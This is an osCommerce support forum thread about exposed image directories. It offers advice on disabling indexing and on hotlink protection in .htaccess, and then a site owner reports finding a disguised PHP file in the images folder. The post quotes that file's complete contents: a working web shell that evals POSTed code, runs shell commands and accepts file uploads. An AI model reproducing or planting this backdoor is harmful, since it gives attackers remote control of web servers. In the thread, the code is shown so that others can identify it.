Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Problem with folder images, i can see it


blondu'

Recommended Posts

Posted

If the only problem is that random visitors can enter a directory (folder) in the browser, and see all the files in it, you can do one of two things: you can put in a dummy index.html in that directory (empty file or something trivial), or you can set your system to "disable indexing" via a control panel button or adding a Options -Indexes line to .htaccess.

 

Being able to see image files is not a security hazard, but you might not want visitors to see other kinds of files. Remember that anyone can view a page source and get the name and path of any image file, and directly call up that image. Adding "hotlink protection" that allows "empty" (command line) would prevent someone from doing that.

Posted

I fix the problem with .htacces

 

AuthUserFile /dev/null

AuthGroupFile /dev/null

 

RewriteEngine On

 

RewriteCond %{HTTP_REFERER} !^http://www.site.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://ma.osite.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://members.site.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://ochesite.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://911.222.111.111.* [NC]

 

RewriteRule /* http://osite.com/index.html [R,L]

 

Posted

And I have problems with images folder. I found the folder goog1e5b6d6f1840c255.php

 

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Posted

Looks like something a hacker might use to me.

 

It's not "normal" to have PHP files in your images folder (on most sites).

 

If you were an astronaut I would advise you to "get on the horn" and repeat the infamous words from Apollo 13:

 

"Houston... We have a problem...."

:'(

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

  • 2 months later...

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...